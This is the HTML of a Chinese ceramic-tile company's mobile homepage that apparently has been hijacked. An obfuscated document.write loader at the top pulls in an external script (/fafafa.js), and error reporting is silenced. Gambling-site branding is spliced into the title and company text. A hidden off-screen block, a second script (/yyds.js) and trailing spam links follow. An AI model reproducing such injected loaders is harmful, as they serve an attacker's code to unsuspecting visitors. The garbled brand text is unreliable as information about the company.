<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script><!DOCTYPE html>
<html>
<!--头部--><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache, max-age=0, must-revalidate, no-store">
<meta http-equiv="Expires" content="0">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<meta name="screen-orientation" content="portrait"><!-- uc强制竖屏 -->
<meta name="x5-orientation" content="portrait"><!-- QQ强制竖屏 -->
    <link href="/css/reset.css" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="/icon/iconfont.css">
    <link href="/css/swiper.min.css" rel="stylesheet" type="text/css"  media="all">
    <link href="/css/mcommon.css" rel="stylesheet">
    <link href="/css/mnew.css" rel="stylesheet">
<script src="/js/jquery.min.js" ></script>
   <style>
     .mast1{position: fixed; top: 0; right: 0; bottom: 0; left: 0; background: rgba(0,0,0,.5);z-index: 9996;}
     .ad01{ position: fixed; width: 80%; left: 10%; right:10%; top: 50%; transform: translateY(-50%); z-index: 9999;}
     .ad01 img{ max-width: 100%; height: auto;}
     .adbox{ position: relative; display: block;}
     .close{ position: absolute; display: block; width: 100%; height:13% ;  bottom: 0;}
.column_banner a{postion:absolute;display:block;width:100%;height:100%;z-index:99}
    </style>
    <title>易游·(中国区)体育官方网站-YY SPORTS</title>
<meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"/>
<link rel="canonical" href="http://www.00394.cn/">
<meta name="mobile-agent"content="format=[wml|xhtml|html5]; url=http://m.00394.cn/">
<link href="http://m.00394.cn/" rel="alternate" media="only screen and (max-width: 1000px)" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta name="applicable-device" content="pc,mobile">
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />

  <div id="n2galp" class="header"><div id="sn02sy" class="logo"><a href="/"><img src="/img/logo.png"></a></div><div id="qctgje" class="header-right"><ul><li></li></ul></div></div>    
    <div id="ra2g85" class="mobile-bar"><span></span></div>
<div id="z1s2gt" class="ad01"><div id="j8w67k" class="adbox"><a href="/v-1-3268.aspx" target="_blank"><img src="/img/ad2023.png" /></a><a class="close"></a></div></div>
<div id="63n7f5" class="mast1"></div>
<script>
var iTime
iTime=setTimeout("test()",10000);
function test(){
$('.ad01,.mast1').hide();
}
$(".mast1,.close").click(function(){
  $('.ad01,.mast1').hide();  
})
</script>
<div id="0ln2gp" class="column_banner"><div class="swiper-container" id="column">
        <div id="18xrjq" class="swiper-wrapper">
       
<div id="gq90aa" class="swiper-slide" style=" background: url(/UploadFiles/Z133316448298055.jpg) no-repeat center center; background-size: cover;"> <a href="/v-1-3268.aspx"></a></div>

<div id="22jlpy" class="swiper-slide" style=" background: url(/UploadFiles/W133316449164930.jpg) no-repeat center center; background-size: cover;"> <a href="/v-1-2428.aspx"></a></div>

<div id="w8hn39" class="swiper-slide" style=" background: url(/UploadFiles/L133316450659079.jpg) no-repeat center center; background-size: cover;"> <a href="https://pc.00394.cn/"></a></div>

<div id="1qy2xh" class="swiper-slide" style=" background: url(/UploadFiles/8133316451180068.jpg) no-repeat center center; background-size: cover;"> <a href="/v-1-2428.aspx"></a></div>

<div id="zt9qm7" class="swiper-slide" style=" background: url(/UploadFiles/P133316452358871.jpg) no-repeat center center; background-size: cover;"> <a href="https://pc.00394.cn/"></a></div>

           
            </div>
            <div id="dlcaga" class="swiper-pagination"></div>
            </div>
</div>
<div id="qz0h83" class="m-home-1">
<div id="3yhh67" class="m-home-name"><b>选择你的米乐YY易游磁砖</b>认识米乐YY易游的瓷砖系列</div>
<div id="0g8mnd" class="more-btn">更多产品系列</div>
</div>
<div id="rn0q18" class="m-home-2"><div id="cr4447" class="mast"></div><div id="skl4k5" class="bd2-content">
<p>CIMIC TILES</p>米乐YY易游磁砖以“中西合璧”的时尚理念为设计源泉，选用意大利、瑞士全套专业瓷砖生产线，通过智能仿真技术，精选不含辐射物质的原料，生产出自然亮丽的瓷砖产品。<div id="l51kw2" class="more-btn"><a href="/3g/view.aspx?m_id=1&amp;id=176">更多详情</a></div></div>
</div>
<div id="kyzq5f" class="m-home-3">
<div id="8f8d13" class="m-home-name"><b>公司新闻</b>实时更新米乐YY易游磁砖最新信息</div>
<div id="3cx0ky" class="show-news">
<ul>
<li><a href="/3g/view.aspx?m_id=1&id=3393"><b>捷报 | 米乐YY易游荣膺2024品牌强国双项重磅荣誉</b>
<p> 2025-03-28</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3392"><b>快讯 | 米乐YY易游磁砖荣膺“2024年度中国家居冠军榜匠心质造品牌”</b>
<p> 2025-03-28</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3391"><b>服务进阶 荣耀加冕 | 米乐YY易游磁砖荣获网易家居2025年度家居行业服务榜样</b>
<p> 2025-03-28</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3372"><b>喜报|米乐YY易游玻化石荣获2024“京闻·创响杯”建筑装饰产品设计大赛陶瓷优秀奖</b>
<p> 2025-01-14</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3371"><b>力量见证 | 米乐YY易游磁砖2024年度博鳌企业论坛上实力双丰收！</b>
<p> 2025-01-14</p></a></li>


</ul>
</div>
<div id="dfy9p9" class="more-btn">更多详情</div>
</div>

<script>
$(function(){

     var swiper = new Swiper('#column', {
        pagination: '#column .swiper-pagination',
        paginationClickable: true,
        autoplay: '2000',
    });        	
 	});	

</script>

<div id="4g7h7c" class="footer">
    <div id="6170l3" class="containt">
    <div id="xg5sfz" class="footer-list"><ul><li>产品资讯</li>
    <li><a href="/3g/view.aspx?m_id=1&id=176">企业信息</a></li>
    <li><a href="/a/25.aspx">经典案例</a></li>
    <li><a href="/3g/view.aspx?m_id=1&id=1">全国招商</a></li>
    <li><a href="/sales.html">销售网络</a>
     </li>
  
    </ul></div>
    <div id="xc9kln" class="footer-entrance clearfix"><div id="4rsl7l" class="entrance-left"><b>分站路口</b><div id="e0hgcl" class="select"><i>请选择分站</i><dl><dd>悦心健康集团</dd></dl></div></div>
<div id="7wpjlh" class="entrance-right"><i>全国招商热线</i><b>400-820-3892</b></div>
</div></div>
<div id="42lthn" class="share"><ul><li><img src="/img/weibo.png" /></li><li><img src="/img/wechat.png" /><dl><dd><img src="/img/wechat.jpg" /></dd></dl></li><li><img src="/img/dy.png" /><dl><dd><img src="/img/bigdy.jpg" /></dd></dl></li><li> <div id="j5st38" class="containt bottomadr" >公司电话：021-52230777      <br>  售后服务热线：021-54312300  <br>  业务监督电话：021-63862128   <br>  <br> 公司地址：上海市黄浦区中山南一路893号</div></li></ul></div>
<div id="8dmw8e" class="copy"><div id="hsqb1s" class="containt">上海米乐YY易游建筑陶瓷有限公司 版权所有<br> <i>沪ICP备17056386号-1沪公网安备 31010102003311号</i></div></div>
</div>

</div>
</div>
<div id="41y3ls" class="mast"></div>
<div id="fpejkq" class="nav">
    <ul><li> <a href="/3g/">首页</a>    </li> <li>产品资讯 
         </li>   <li> <a href="/3g/view.aspx?m_id=1&amp;id=176"> 企业信息</a></li> <li>   <a href="/a/25.aspx">   经典案例</a> </li>        <li>   <a href="/3g/list.aspx?id=11">    营销活动</a> </li>       <li>       <a href="/3g/view.aspx?m_id=1&amp;id=1">全国招商</a> </li><li>       <a href="/3g/list.aspx?id=187">展厅鉴赏</a> </li>  <li>       <a href="/sales.html">销售网络</a> </li> <li>       <a href="/v-1-32.aspx">在线客服</a> </li>   <li>       <a href="/3g/list.aspx?id=185">电子图册</a> </li> </ul>
    </div>
<div id="6dsr39" class="seachbox"><input name="key"  type="text" class="scText" value=""><input name="" type="submit" class="scBtn" value="搜索" ></div>
<script src="/js/swiper.min.js" ></script>
<script src="/js/common.js" ></script>



<div id='body_jx_304355' style='position:fixed; left:-9000px; top:-9000px;'><zpvuf class='iylsys'><zgeeyk id='iylsys'></zgeeyk></zpvuf><cjzf class='ouomrv'><cuz id='ouomrv'></cuz></cjzf><ea class='slndyz'><dhnab id='slndyz'></dhnab></ea><yy class='pilepw'><byjdat id='pilepw'></byjdat></yy><ybbjv class='iplvyh'><uix id='iplvyh'></uix></ybbjv><fn class='sstuqk'><ht id='sstuqk'></ht></fn><tvsf class='bdsqwq'><svfcu id='bdsqwq'></svfcu></tvsf><drsd class='fxxdnf'><uxk id='fxxdnf'></uxk></drsd><nmxm class='qufbqx'><mhtxyn id='qufbqx'></mhtxyn></nmxm><rp class='wctqwc'><mnx id='wctqwc'></mnx></rp><wwuf class='vnmwut'><mm id='vnmwut'></mm></wwuf><qvty class='mhihnk'><ja id='mhihnk'></ja></qvty><nxu class='xuwqgl'><yg id='xuwqgl'></yg></nxu><esuke class='ojokvz'><ylkdda id='ojokvz'></ylkdda></esuke><uvdo class='rjukem'><pcs id='rjukem'></pcs></uvdo><dgbr class='kbpweh'><goh id='kbpweh'></goh></dgbr><gqwhw class='emdcbq'><gbnok id='emdcbq'></gbnok></gqwhw><iu class='swdauh'><hagns id='swdauh'></hagns></iu><re class='qsllhz'><uqfzx id='qsllhz'></uqfzx></re><nqlbe class='shxkyz'><ye id='shxkyz'></ye></nqlbe><loi class='eqzqnv'><yq id='eqzqnv'></yq></loi><ohwo class='qkryto'><oe id='qkryto'></oe></ohwo><jh class='afjrzm'><tah id='afjrzm'></tah></jh><mg class='qdyocb'><via id='qdyocb'></via></mg><mp class='fecsri'><uo id='fecsri'></uo></mp><hjxx class='qdkaen'><tov id='qdkaen'></tov></hjxx><vka class='rnvznh'><gxzh id='rnvznh'></gxzh></vka><lt class='rfmewf'><xnavu id='rfmewf'></xnavu></lt><ooz class='vlxgtj'><bvcx id='vlxgtj'></bvcx></ooz><ffw class='wttzuz'><du id='wttzuz'></du></ffw><hx class='mhsrvg'><hbvdfn id='mhsrvg'></hbvdfn></hx><ordz class='uvbmpd'><brnkzy id='uvbmpd'></brnkzy></ordz><apkj class='jdcvyy'><ljsms id='jdcvyy'></ljsms></apkj><nkew class='nayhvu'><hbxz id='nayhvu'></hbxz></nkew><hb class='aeelde'><erkl id='aeelde'></erkl></hb><slsu class='ytwnip'><fonsey id='ytwnip'></fonsey></slsu><oz class='payqct'><pppjgv id='payqct'></pppjgv></oz><xnmky class='lzcmgm'><kn id='lzcmgm'></kn></xnmky><zso class='cigdmp'><gq id='cigdmp'></gq></zso><mnv class='uhooic'><evz id='uhooic'></evz></mnv><qyvlu class='oclhxc'><aobf id='oclhxc'></aobf></qyvlu><cjaqo class='xscdzn'><mf id='xscdzn'></mf></cjaqo><pepxd class='aelogk'><nhbv id='aelogk'></nhbv></pepxd><hgazt class='qhlmzn'><gvhmjn id='qhlmzn'></gvhmjn></hgazt><wr class='nckgac'><eenxf id='nckgac'></eenxf></wr><tym class='gczvil'><il id='gczvil'></il></tym><qw class='nbzhep'><suzqph id='nbzhep'></suzqph></qw><aqgj class='yaexcb'><bb id='yaexcb'></bb></aqgj><fvyfy class='efdmkw'><hckwve id='efdmkw'></hckwve></fvyfy><kqups class='dlrdgv'><aegm id='dlrdgv'></aegm></kqups></div>

<div style="text-align:center;"><a href="http://www.00394.cn/data/sitemap/www.00394.cn.xml">【网站地图】</a><a href="http://www.00394.cn/data/sitemap/www.00394.cn.xml">【sitemap】</a></div>
<script src="/yyds.js"></script></body>
</html><a href="/infoswtr/vdwniu.aspx"></a><a href="/listswtr/vdwfcd.aspx"></a><a href="/infoswtr/vdwruj.aspx"></a><a href="/listswtr/vdwiyk.aspx"></a><a href="/infoswtr/vdwtxl.aspx"></a><a href="/listswtr/vdwadp.aspx"></a><a href="/infoswtr/vdwbsr.aspx"></a><a href="/listswtr/vdwflf.aspx"></a><a href="/infoswtr/vdwusk.aspx"></a><a href="/listswtr/vdwhbr.aspx"></a><a href="/infoswtr/vdwmyq.aspx"></a><a href="/listswtr/vdwvjv.aspx"></a><a href="/infoswtr/vdwaln.aspx"></a><a href="/listswtr/vdwloz.aspx"></a><a href="/infoswtr/vdwyqm.aspx"></a><a href="/listswtr/vdwaqv.aspx"></a><a href="/infoswtr/vdwdll.aspx"></a><a href="/listswtr/vdwung.aspx"></a><a href="/infoswtr/vdwjeo.aspx"></a><a href="/listswtr/vdwkah.aspx"></a><!--0.00016498565673828-->